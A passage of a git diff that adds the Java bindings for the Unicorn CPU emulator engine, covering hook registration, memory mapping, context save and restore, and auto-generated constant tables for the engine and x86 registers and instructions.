BB <= end. For the special case in which begin > end, the callback will be + * invoked whenver any basic block is entered. 
+ * + * @param callback Implementation of a BlockHook interface + * @param begin Start address of hooking range + * @param end End address of hooking range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(BlockHook callback, long begin, long end, Object user_data) throws UnicornException { + if (blockHandle == 0) { + blockHandle = registerHook(eng, UC_HOOK_BLOCK, begin, end); + } + blockList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_INTR hooks. The registered callback function will be + * invoked whenever an interrupt instruction is executed. + * + * @param callback Implementation of a InterruptHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(InterruptHook callback, Object user_data) throws UnicornException { + if (interruptHandle == 0) { + interruptHandle = registerHook(eng, UC_HOOK_INTR); + } + intrList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_CODE hooks. The registered callback function will be + * invoked when an instruction is executed from the address range begin <= PC <= end. For + * the special case in which begin > end, the callback will be invoked for ALL instructions. + * + * @param callback Implementation of a CodeHook interface + * @param begin Start address of hooking range + * @param end End address of hooking range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(CodeHook callback, long begin, long end, Object user_data) throws UnicornException { + if (codeHandle == 0) { + codeHandle = registerHook(eng, UC_HOOK_CODE, begin, end); + } + codeList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_MEM_READ hooks. 
The registered callback function will be + * invoked whenever a memory read is performed within the address range begin <= read_addr <= end. For + * the special case in which begin > end, the callback will be invoked for ALL memory reads. + * + * @param callback Implementation of a ReadHook interface + * @param begin Start address of memory read range + * @param end End address of memory read range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(ReadHook callback, long begin, long end, Object user_data) throws UnicornException { + if (readHandle == 0) { + readHandle = registerHook(eng, UC_HOOK_MEM_READ, begin, end); + } + readList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_MEM_WRITE hooks. The registered callback function will be + * invoked whenever a memory write is performed within the address range begin <= write_addr <= end. For + * the special case in which begin > end, the callback will be invoked for ALL memory writes. + * + * @param callback Implementation of a WriteHook interface + * @param begin Start address of memory write range + * @param end End address of memory write range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(WriteHook callback, long begin, long end, Object user_data) throws UnicornException { + if (writeHandle == 0) { + writeHandle = registerHook(eng, UC_HOOK_MEM_WRITE, begin, end); + } + writeList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_MEM_WRITE | UC_HOOK_MEM_WRITE hooks. The registered callback function will be + * invoked whenever a memory write or read is performed within the address range begin <= addr <= end. For + * the special case in which begin > end, the callback will be invoked for ALL memory writes. 
+ * + * @param callback Implementation of a MemHook interface + * @param begin Start address of memory range + * @param end End address of memory range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(MemHook callback, long begin, long end, Object user_data) throws UnicornException { + hook_add((ReadHook)callback, begin, end, user_data); + hook_add((WriteHook)callback, begin, end, user_data); + } + +/** + * Hook registration for UC_HOOK_MEM_XXX_UNMAPPED and UC_HOOK_MEM_XXX_PROT hooks. + * The registered callback function will be invoked whenever a read or write is + * attempted from an invalid or protected memory address. + * + * @param callback Implementation of a EventMemHook interface + * @param type Type of memory event being hooked such as UC_HOOK_MEM_READ_UNMAPPED or UC_HOOK_MEM_WRITE_PROT + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(EventMemHook callback, int type, Object user_data) throws UnicornException { + //test all of the EventMem related bits in type + for (Integer htype : eventMemMap.keySet()) { + if ((type & htype) != 0) { //the 'htype' bit is set in type + Long handle = eventMemHandles.get(htype); + if (handle == null) { + eventMemHandles.put(htype, registerHook(eng, htype)); + } + int cbType = eventMemMap.get(htype); + ArrayList flist = eventMemLists.get(cbType); + if (flist == null) { + flist = new ArrayList(); + allLists.add(flist); + eventMemLists.put(cbType, flist); + } + flist.add(new Tuple(callback, user_data)); + } + } + } + +/** + * Hook registration for UC_HOOK_INSN hooks (x86 IN instruction only). The registered callback + * function will be invoked whenever an x86 IN instruction is executed. 
+ * + * @param callback Implementation of a InHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(InHook callback, Object user_data) throws UnicornException { + if (inHandle == 0) { + inHandle = registerHook(eng, UC_HOOK_INSN, Unicorn.UC_X86_INS_IN); + } + inList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_INSN hooks (x86 OUT instruction only). The registered callback + * function will be invoked whenever an x86 OUT instruction is executed. + * + * @param callback Implementation of a OutHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(OutHook callback, Object user_data) throws UnicornException { + if (outHandle == 0) { + outHandle = registerHook(eng, UC_HOOK_INSN, Unicorn.UC_X86_INS_OUT); + } + outList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_INSN hooks (x86 SYSCALL/SYSENTER instruction only). The registered callback + * function will be invoked whenever an x86 SYSCALL or SYSENTER instruction is executed. + * + * @param callback Implementation of a SyscallHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(SyscallHook callback, Object user_data) throws UnicornException { + if (syscallHandle == 0) { + syscallHandle = registerHook(eng, UC_HOOK_INSN, Unicorn.UC_X86_INS_SYSCALL); + } + syscallList.add(new Tuple(callback, user_data)); + } + + public void hook_del(Hook hook) throws UnicornException { + for (ArrayList l : allLists) { + for (Tuple t : l) { + if (t.function.equals(hook)) { + allLists.remove(t); + return; + } + } + } + } + +/** + * Map a range of memory. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + * @param perms Permissions on the memory block. 
A combination of UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC + */ + public native void mem_map(long address, long size, int perms) throws UnicornException; + +/** + * Map existing host memory in for emulation. + * This API adds a memory region that can be used by emulation. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + * @param perms Permissions on the memory block. A combination of UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC + * @param ptr Block of host memory backing the newly mapped memory. This block is + * expected to be an equal or larger size than provided, and be mapped with at + * least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + */ + public native void mem_map_ptr(long address, long size, int perms, byte[] block) throws UnicornException; + +/** + * Unmap a range of memory. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + */ + public native void mem_unmap(long address, long size) throws UnicornException; + +/** + * Change permissions on a range of memory. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + * @param perms New permissions on the memory block. A combination of UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC + */ + public native void mem_protect(long address, long size, int perms) throws UnicornException; + +/** + * Retrieve all memory regions mapped by mem_map() and mem_map_ptr() + * NOTE: memory regions may be split by mem_unmap() + * + * @return list of mapped regions. +*/ + public native MemRegion[] mem_regions() throws UnicornException; + +/** + * Allocate a region that can be used with uc_context_{save,restore} to perform + * quick save/rollback of the CPU context, which includes registers and some + * internal metadata. Contexts may not be shared across engine instances with + * differing arches or modes. + * + * @return context handle for use with save/restore. 
+*/ + public native long context_alloc(); + +/** + * Free a resource allocated within Unicorn. Use for handles + * allocated by context_alloc. + * + * @param Previously allocated Unicorn object handle. +*/ + public native void free(long handle); + +/** + * Save a copy of the internal CPU context. + * This API should be used to efficiently make or update a saved copy of the + * internal CPU state. + * + * @param context handle previously returned by context_alloc. +*/ + public native void context_save(long context); + +/** + * Restore the current CPU context from a saved copy. + * This API should be used to roll the CPU context back to a previous + * state saved by uc_context_save(). + * + * @param context handle previously returned by context_alloc. +*/ + public native void context_restore(long context); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornConst.java new file mode 100644 index 0000000..ee5c984 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornConst.java @@ -0,0 +1,114 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT

package unicorn;

// Engine-wide constants mirroring the UC_* enums of the native Unicorn C API.
public interface UnicornConst {
   // Library / API version numbers.
   public static final int UC_API_MAJOR = 1;

   public static final int UC_API_MINOR = 0;
   public static final int UC_VERSION_MAJOR = 1;

   public static final int UC_VERSION_MINOR = 0;
   public static final int UC_VERSION_EXTRA = 2;
   // Timeout scale factors for emu_start (microsecond base unit).
   public static final int UC_SECOND_SCALE = 1000000;
   public static final int UC_MILISECOND_SCALE = 1000;
   // Architecture selectors (UC_ARCH_*).
   public static final int UC_ARCH_ARM = 1;
   public static final int UC_ARCH_ARM64 = 2;
   public static final int UC_ARCH_MIPS = 3;
   public static final int UC_ARCH_X86 = 4;
   public static final int UC_ARCH_PPC = 5;
   public static final int UC_ARCH_SPARC = 6;
   public static final int UC_ARCH_M68K = 7;
   public static final int UC_ARCH_MAX = 8;

   // Hardware mode flags (UC_MODE_*); combined with bitwise OR.
   public static final int UC_MODE_LITTLE_ENDIAN = 0;
   public static final int UC_MODE_BIG_ENDIAN = 1073741824;

   public static final int UC_MODE_ARM = 0;
   public static final int UC_MODE_THUMB = 16;
   public static final int UC_MODE_MCLASS = 32;
   public static final int UC_MODE_V8 = 64;
   public static final int UC_MODE_ARM926 = 128;
   public static final int UC_MODE_ARM946 = 256;
   public static final int UC_MODE_ARM1176 = 512;
   // NOTE: several mode flags share numeric values across architectures
   // (e.g. UC_MODE_MICRO == UC_MODE_THUMB == 16); they are disambiguated
   // by the UC_ARCH_* value they are used with.
   public static final int UC_MODE_MICRO = 16;
   public static final int UC_MODE_MIPS3 = 32;
   public static final int UC_MODE_MIPS32R6 = 64;
   public static final int UC_MODE_MIPS32 = 4;
   public static final int UC_MODE_MIPS64 = 8;
   public static final int UC_MODE_16 = 2;
   public static final int UC_MODE_32 = 4;
   public static final int UC_MODE_64 = 8;
   public static final int UC_MODE_PPC32 = 4;
   public static final int UC_MODE_PPC64 = 8;
   public static final int UC_MODE_QPX = 16;
   public static final int UC_MODE_SPARC32 = 4;
   public static final int UC_MODE_SPARC64 = 8;
   public static final int UC_MODE_V9 = 16;

   // Error codes returned by the engine (uc_err / UC_ERR_*).
   public static final int UC_ERR_OK = 0;
   public static final int UC_ERR_NOMEM = 1;
   public static final int UC_ERR_ARCH = 2;
   public static final int UC_ERR_HANDLE = 3;
   public static final int UC_ERR_MODE = 4;
   public static final int UC_ERR_VERSION = 5;
   public static final int UC_ERR_READ_UNMAPPED = 6;
   public static final int UC_ERR_WRITE_UNMAPPED = 7;
   public static final int UC_ERR_FETCH_UNMAPPED = 8;
   public static final int UC_ERR_HOOK = 9;
   public static final int UC_ERR_INSN_INVALID = 10;
   public static final int UC_ERR_MAP = 11;
   public static final int UC_ERR_WRITE_PROT = 12;
   public static final int UC_ERR_READ_PROT = 13;
   public static final int UC_ERR_FETCH_PROT = 14;
   public static final int UC_ERR_ARG = 15;
   public static final int UC_ERR_READ_UNALIGNED = 16;
   public static final int UC_ERR_WRITE_UNALIGNED = 17;
   public static final int UC_ERR_FETCH_UNALIGNED = 18;
   public static final int UC_ERR_HOOK_EXIST = 19;
   public static final int UC_ERR_RESOURCE = 20;
   public static final int UC_ERR_EXCEPTION = 21;
   // Memory event types reported to callbacks (UC_MEM_*).
   public static final int UC_MEM_READ = 16;
   public static final int UC_MEM_WRITE = 17;
   public static final int UC_MEM_FETCH = 18;
   public static final int UC_MEM_READ_UNMAPPED = 19;
   public static final int UC_MEM_WRITE_UNMAPPED = 20;
   public static final int UC_MEM_FETCH_UNMAPPED = 21;
   public static final int UC_MEM_WRITE_PROT = 22;
   public static final int UC_MEM_READ_PROT = 23;
   public static final int UC_MEM_FETCH_PROT = 24;
   public static final int UC_MEM_READ_AFTER = 25;
   // Hook type flags used with hook registration (UC_HOOK_*); bit flags.
   public static final int UC_HOOK_INTR = 1;
   public static final int UC_HOOK_INSN = 2;
   public static final int UC_HOOK_CODE = 4;
   public static final int UC_HOOK_BLOCK = 8;
   public static final int UC_HOOK_MEM_READ_UNMAPPED = 16;
   public static final int UC_HOOK_MEM_WRITE_UNMAPPED = 32;
   public static final int UC_HOOK_MEM_FETCH_UNMAPPED = 64;
   public static final int UC_HOOK_MEM_READ_PROT = 128;
   public static final int UC_HOOK_MEM_WRITE_PROT = 256;
   public static final int UC_HOOK_MEM_FETCH_PROT = 512;
   public static final int UC_HOOK_MEM_READ = 1024;
   public static final int UC_HOOK_MEM_WRITE = 2048;
   public static final int UC_HOOK_MEM_FETCH = 4096;
   public static final int UC_HOOK_MEM_READ_AFTER = 8192;
   public static final int UC_HOOK_INSN_INVALID = 16384;
   // Convenience combinations of the individual UC_HOOK_MEM_* bits.
   public static final int UC_HOOK_MEM_UNMAPPED = 112;
   public static final int UC_HOOK_MEM_PROT = 896;
   public static final int UC_HOOK_MEM_READ_INVALID = 144;
   public static final int UC_HOOK_MEM_WRITE_INVALID = 288;
   public static final int UC_HOOK_MEM_FETCH_INVALID = 576;
   public static final int UC_HOOK_MEM_INVALID = 1008;
   public static final int UC_HOOK_MEM_VALID = 7168;
   // Query selectors for query() (UC_QUERY_*).
   public static final int UC_QUERY_MODE = 1;
   public static final int UC_QUERY_PAGE_SIZE = 2;
   public static final int UC_QUERY_ARCH = 3;
   public static final int UC_QUERY_TIMEOUT = 4;

   // Memory protection flags for mem_map/mem_protect (UC_PROT_*); bit flags.
   public static final int UC_PROT_NONE = 0;
   public static final int UC_PROT_READ = 1;
   public static final int UC_PROT_WRITE = 2;
   public static final int UC_PROT_EXEC = 4;
   public static final int UC_PROT_ALL = 7;

}
diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornException.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornException.java
new file mode 100644
index 0000000..175775c
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornException.java
@@ -0,0 +1,34 @@
/*

Java bindings for the Unicorn Emulator Engine

Copyright(c) 2015 Chris Eagle

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

*/

package unicorn;

/**
 * Unchecked exception thrown by the Unicorn Java bindings when a native
 * engine call fails. The message, when present, is typically the engine's
 * error string (see Unicorn.strerror).
 */
public class UnicornException extends RuntimeException {

   /** Construct an exception with no detail message. */
   public UnicornException() {
      super();
   }

   /**
    * Construct an exception with a detail message.
    *
    * @param msg description of the failure
    */
   public UnicornException(String msg) {
      super(msg);
   }

}
diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/WriteHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/WriteHook.java
new file mode 100644
index 0000000..ee0f79c
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/WriteHook.java
@@ -0,0 +1,29 @@
/*

Java bindings for the Unicorn Emulator Engine

Copyright(c) 2015 Chris Eagle

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

*/

package unicorn;

/**
 * Callback interface for UC_HOOK_MEM_WRITE hooks; invoked for each
 * emulated memory write within the hooked address range.
 */
public interface WriteHook extends Hook {

   /**
    * Called on an emulated memory write.
    *
    * @param u Unicorn instance that triggered the event
    * @param address address being written
    * @param size size in bytes of the write
    * @param value value being written
    * @param user user data supplied at hook registration
    */
   public void hook(Unicorn u, long address, int size, long value, Object user);

}

diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86Const.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86Const.java
new file mode 100644
index 0000000..d7a358b
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86Const.java
@@ -0,0 +1,1605 @@
// For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface X86Const { + +// X86 registers + + public static final int UC_X86_REG_INVALID = 0; + public static final int UC_X86_REG_AH = 1; + public static final int UC_X86_REG_AL = 2; + public static final int UC_X86_REG_AX = 3; + public static final int UC_X86_REG_BH = 4; + public static final int UC_X86_REG_BL = 5; + public static final int UC_X86_REG_BP = 6; + public static final int UC_X86_REG_BPL = 7; + public static final int UC_X86_REG_BX = 8; + public static final int UC_X86_REG_CH = 9; + public static final int UC_X86_REG_CL = 10; + public static final int UC_X86_REG_CS = 11; + public static final int UC_X86_REG_CX = 12; + public static final int UC_X86_REG_DH = 13; + public static final int UC_X86_REG_DI = 14; + public static final int UC_X86_REG_DIL = 15; + public static final int UC_X86_REG_DL = 16; + public static final int UC_X86_REG_DS = 17; + public static final int UC_X86_REG_DX = 18; + public static final int UC_X86_REG_EAX = 19; + public static final int UC_X86_REG_EBP = 20; + public static final int UC_X86_REG_EBX = 21; + public static final int UC_X86_REG_ECX = 22; + public static final int UC_X86_REG_EDI = 23; + public static final int UC_X86_REG_EDX = 24; + public static final int UC_X86_REG_EFLAGS = 25; + public static final int UC_X86_REG_EIP = 26; + public static final int UC_X86_REG_EIZ = 27; + public static final int UC_X86_REG_ES = 28; + public static final int UC_X86_REG_ESI = 29; + public static final int UC_X86_REG_ESP = 30; + public static final int UC_X86_REG_FPSW = 31; + public static final int UC_X86_REG_FS = 32; + public static final int UC_X86_REG_GS = 33; + public static final int UC_X86_REG_IP = 34; + public static final int UC_X86_REG_RAX = 35; + public static final int UC_X86_REG_RBP = 36; + public static final int UC_X86_REG_RBX = 37; + public static final int UC_X86_REG_RCX = 38; + public static final int UC_X86_REG_RDI = 39; + public static final int 
UC_X86_REG_RDX = 40; + public static final int UC_X86_REG_RIP = 41; + public static final int UC_X86_REG_RIZ = 42; + public static final int UC_X86_REG_RSI = 43; + public static final int UC_X86_REG_RSP = 44; + public static final int UC_X86_REG_SI = 45; + public static final int UC_X86_REG_SIL = 46; + public static final int UC_X86_REG_SP = 47; + public static final int UC_X86_REG_SPL = 48; + public static final int UC_X86_REG_SS = 49; + public static final int UC_X86_REG_CR0 = 50; + public static final int UC_X86_REG_CR1 = 51; + public static final int UC_X86_REG_CR2 = 52; + public static final int UC_X86_REG_CR3 = 53; + public static final int UC_X86_REG_CR4 = 54; + public static final int UC_X86_REG_CR5 = 55; + public static final int UC_X86_REG_CR6 = 56; + public static final int UC_X86_REG_CR7 = 57; + public static final int UC_X86_REG_CR8 = 58; + public static final int UC_X86_REG_CR9 = 59; + public static final int UC_X86_REG_CR10 = 60; + public static final int UC_X86_REG_CR11 = 61; + public static final int UC_X86_REG_CR12 = 62; + public static final int UC_X86_REG_CR13 = 63; + public static final int UC_X86_REG_CR14 = 64; + public static final int UC_X86_REG_CR15 = 65; + public static final int UC_X86_REG_DR0 = 66; + public static final int UC_X86_REG_DR1 = 67; + public static final int UC_X86_REG_DR2 = 68; + public static final int UC_X86_REG_DR3 = 69; + public static final int UC_X86_REG_DR4 = 70; + public static final int UC_X86_REG_DR5 = 71; + public static final int UC_X86_REG_DR6 = 72; + public static final int UC_X86_REG_DR7 = 73; + public static final int UC_X86_REG_DR8 = 74; + public static final int UC_X86_REG_DR9 = 75; + public static final int UC_X86_REG_DR10 = 76; + public static final int UC_X86_REG_DR11 = 77; + public static final int UC_X86_REG_DR12 = 78; + public static final int UC_X86_REG_DR13 = 79; + public static final int UC_X86_REG_DR14 = 80; + public static final int UC_X86_REG_DR15 = 81; + public static final int UC_X86_REG_FP0 = 
82; + public static final int UC_X86_REG_FP1 = 83; + public static final int UC_X86_REG_FP2 = 84; + public static final int UC_X86_REG_FP3 = 85; + public static final int UC_X86_REG_FP4 = 86; + public static final int UC_X86_REG_FP5 = 87; + public static final int UC_X86_REG_FP6 = 88; + public static final int UC_X86_REG_FP7 = 89; + public static final int UC_X86_REG_K0 = 90; + public static final int UC_X86_REG_K1 = 91; + public static final int UC_X86_REG_K2 = 92; + public static final int UC_X86_REG_K3 = 93; + public static final int UC_X86_REG_K4 = 94; + public static final int UC_X86_REG_K5 = 95; + public static final int UC_X86_REG_K6 = 96; + public static final int UC_X86_REG_K7 = 97; + public static final int UC_X86_REG_MM0 = 98; + public static final int UC_X86_REG_MM1 = 99; + public static final int UC_X86_REG_MM2 = 100; + public static final int UC_X86_REG_MM3 = 101; + public static final int UC_X86_REG_MM4 = 102; + public static final int UC_X86_REG_MM5 = 103; + public static final int UC_X86_REG_MM6 = 104; + public static final int UC_X86_REG_MM7 = 105; + public static final int UC_X86_REG_R8 = 106; + public static final int UC_X86_REG_R9 = 107; + public static final int UC_X86_REG_R10 = 108; + public static final int UC_X86_REG_R11 = 109; + public static final int UC_X86_REG_R12 = 110; + public static final int UC_X86_REG_R13 = 111; + public static final int UC_X86_REG_R14 = 112; + public static final int UC_X86_REG_R15 = 113; + public static final int UC_X86_REG_ST0 = 114; + public static final int UC_X86_REG_ST1 = 115; + public static final int UC_X86_REG_ST2 = 116; + public static final int UC_X86_REG_ST3 = 117; + public static final int UC_X86_REG_ST4 = 118; + public static final int UC_X86_REG_ST5 = 119; + public static final int UC_X86_REG_ST6 = 120; + public static final int UC_X86_REG_ST7 = 121; + public static final int UC_X86_REG_XMM0 = 122; + public static final int UC_X86_REG_XMM1 = 123; + public static final int UC_X86_REG_XMM2 = 124; + 
public static final int UC_X86_REG_XMM3 = 125; + public static final int UC_X86_REG_XMM4 = 126; + public static final int UC_X86_REG_XMM5 = 127; + public static final int UC_X86_REG_XMM6 = 128; + public static final int UC_X86_REG_XMM7 = 129; + public static final int UC_X86_REG_XMM8 = 130; + public static final int UC_X86_REG_XMM9 = 131; + public static final int UC_X86_REG_XMM10 = 132; + public static final int UC_X86_REG_XMM11 = 133; + public static final int UC_X86_REG_XMM12 = 134; + public static final int UC_X86_REG_XMM13 = 135; + public static final int UC_X86_REG_XMM14 = 136; + public static final int UC_X86_REG_XMM15 = 137; + public static final int UC_X86_REG_XMM16 = 138; + public static final int UC_X86_REG_XMM17 = 139; + public static final int UC_X86_REG_XMM18 = 140; + public static final int UC_X86_REG_XMM19 = 141; + public static final int UC_X86_REG_XMM20 = 142; + public static final int UC_X86_REG_XMM21 = 143; + public static final int UC_X86_REG_XMM22 = 144; + public static final int UC_X86_REG_XMM23 = 145; + public static final int UC_X86_REG_XMM24 = 146; + public static final int UC_X86_REG_XMM25 = 147; + public static final int UC_X86_REG_XMM26 = 148; + public static final int UC_X86_REG_XMM27 = 149; + public static final int UC_X86_REG_XMM28 = 150; + public static final int UC_X86_REG_XMM29 = 151; + public static final int UC_X86_REG_XMM30 = 152; + public static final int UC_X86_REG_XMM31 = 153; + public static final int UC_X86_REG_YMM0 = 154; + public static final int UC_X86_REG_YMM1 = 155; + public static final int UC_X86_REG_YMM2 = 156; + public static final int UC_X86_REG_YMM3 = 157; + public static final int UC_X86_REG_YMM4 = 158; + public static final int UC_X86_REG_YMM5 = 159; + public static final int UC_X86_REG_YMM6 = 160; + public static final int UC_X86_REG_YMM7 = 161; + public static final int UC_X86_REG_YMM8 = 162; + public static final int UC_X86_REG_YMM9 = 163; + public static final int UC_X86_REG_YMM10 = 164; + public static 
final int UC_X86_REG_YMM11 = 165; + public static final int UC_X86_REG_YMM12 = 166; + public static final int UC_X86_REG_YMM13 = 167; + public static final int UC_X86_REG_YMM14 = 168; + public static final int UC_X86_REG_YMM15 = 169; + public static final int UC_X86_REG_YMM16 = 170; + public static final int UC_X86_REG_YMM17 = 171; + public static final int UC_X86_REG_YMM18 = 172; + public static final int UC_X86_REG_YMM19 = 173; + public static final int UC_X86_REG_YMM20 = 174; + public static final int UC_X86_REG_YMM21 = 175; + public static final int UC_X86_REG_YMM22 = 176; + public static final int UC_X86_REG_YMM23 = 177; + public static final int UC_X86_REG_YMM24 = 178; + public static final int UC_X86_REG_YMM25 = 179; + public static final int UC_X86_REG_YMM26 = 180; + public static final int UC_X86_REG_YMM27 = 181; + public static final int UC_X86_REG_YMM28 = 182; + public static final int UC_X86_REG_YMM29 = 183; + public static final int UC_X86_REG_YMM30 = 184; + public static final int UC_X86_REG_YMM31 = 185; + public static final int UC_X86_REG_ZMM0 = 186; + public static final int UC_X86_REG_ZMM1 = 187; + public static final int UC_X86_REG_ZMM2 = 188; + public static final int UC_X86_REG_ZMM3 = 189; + public static final int UC_X86_REG_ZMM4 = 190; + public static final int UC_X86_REG_ZMM5 = 191; + public static final int UC_X86_REG_ZMM6 = 192; + public static final int UC_X86_REG_ZMM7 = 193; + public static final int UC_X86_REG_ZMM8 = 194; + public static final int UC_X86_REG_ZMM9 = 195; + public static final int UC_X86_REG_ZMM10 = 196; + public static final int UC_X86_REG_ZMM11 = 197; + public static final int UC_X86_REG_ZMM12 = 198; + public static final int UC_X86_REG_ZMM13 = 199; + public static final int UC_X86_REG_ZMM14 = 200; + public static final int UC_X86_REG_ZMM15 = 201; + public static final int UC_X86_REG_ZMM16 = 202; + public static final int UC_X86_REG_ZMM17 = 203; + public static final int UC_X86_REG_ZMM18 = 204; + public static final int 
UC_X86_REG_ZMM19 = 205; + public static final int UC_X86_REG_ZMM20 = 206; + public static final int UC_X86_REG_ZMM21 = 207; + public static final int UC_X86_REG_ZMM22 = 208; + public static final int UC_X86_REG_ZMM23 = 209; + public static final int UC_X86_REG_ZMM24 = 210; + public static final int UC_X86_REG_ZMM25 = 211; + public static final int UC_X86_REG_ZMM26 = 212; + public static final int UC_X86_REG_ZMM27 = 213; + public static final int UC_X86_REG_ZMM28 = 214; + public static final int UC_X86_REG_ZMM29 = 215; + public static final int UC_X86_REG_ZMM30 = 216; + public static final int UC_X86_REG_ZMM31 = 217; + public static final int UC_X86_REG_R8B = 218; + public static final int UC_X86_REG_R9B = 219; + public static final int UC_X86_REG_R10B = 220; + public static final int UC_X86_REG_R11B = 221; + public static final int UC_X86_REG_R12B = 222; + public static final int UC_X86_REG_R13B = 223; + public static final int UC_X86_REG_R14B = 224; + public static final int UC_X86_REG_R15B = 225; + public static final int UC_X86_REG_R8D = 226; + public static final int UC_X86_REG_R9D = 227; + public static final int UC_X86_REG_R10D = 228; + public static final int UC_X86_REG_R11D = 229; + public static final int UC_X86_REG_R12D = 230; + public static final int UC_X86_REG_R13D = 231; + public static final int UC_X86_REG_R14D = 232; + public static final int UC_X86_REG_R15D = 233; + public static final int UC_X86_REG_R8W = 234; + public static final int UC_X86_REG_R9W = 235; + public static final int UC_X86_REG_R10W = 236; + public static final int UC_X86_REG_R11W = 237; + public static final int UC_X86_REG_R12W = 238; + public static final int UC_X86_REG_R13W = 239; + public static final int UC_X86_REG_R14W = 240; + public static final int UC_X86_REG_R15W = 241; + public static final int UC_X86_REG_IDTR = 242; + public static final int UC_X86_REG_GDTR = 243; + public static final int UC_X86_REG_LDTR = 244; + public static final int UC_X86_REG_TR = 245; + public 
static final int UC_X86_REG_FPCW = 246; + public static final int UC_X86_REG_FPTAG = 247; + public static final int UC_X86_REG_MSR = 248; + public static final int UC_X86_REG_MXCSR = 249; + public static final int UC_X86_REG_FS_BASE = 250; + public static final int UC_X86_REG_GS_BASE = 251; + public static final int UC_X86_REG_ENDING = 252; + +// X86 instructions + + public static final int UC_X86_INS_INVALID = 0; + public static final int UC_X86_INS_AAA = 1; + public static final int UC_X86_INS_AAD = 2; + public static final int UC_X86_INS_AAM = 3; + public static final int UC_X86_INS_AAS = 4; + public static final int UC_X86_INS_FABS = 5; + public static final int UC_X86_INS_ADC = 6; + public static final int UC_X86_INS_ADCX = 7; + public static final int UC_X86_INS_ADD = 8; + public static final int UC_X86_INS_ADDPD = 9; + public static final int UC_X86_INS_ADDPS = 10; + public static final int UC_X86_INS_ADDSD = 11; + public static final int UC_X86_INS_ADDSS = 12; + public static final int UC_X86_INS_ADDSUBPD = 13; + public static final int UC_X86_INS_ADDSUBPS = 14; + public static final int UC_X86_INS_FADD = 15; + public static final int UC_X86_INS_FIADD = 16; + public static final int UC_X86_INS_FADDP = 17; + public static final int UC_X86_INS_ADOX = 18; + public static final int UC_X86_INS_AESDECLAST = 19; + public static final int UC_X86_INS_AESDEC = 20; + public static final int UC_X86_INS_AESENCLAST = 21; + public static final int UC_X86_INS_AESENC = 22; + public static final int UC_X86_INS_AESIMC = 23; + public static final int UC_X86_INS_AESKEYGENASSIST = 24; + public static final int UC_X86_INS_AND = 25; + public static final int UC_X86_INS_ANDN = 26; + public static final int UC_X86_INS_ANDNPD = 27; + public static final int UC_X86_INS_ANDNPS = 28; + public static final int UC_X86_INS_ANDPD = 29; + public static final int UC_X86_INS_ANDPS = 30; + public static final int UC_X86_INS_ARPL = 31; + public static final int UC_X86_INS_BEXTR = 32; + public 
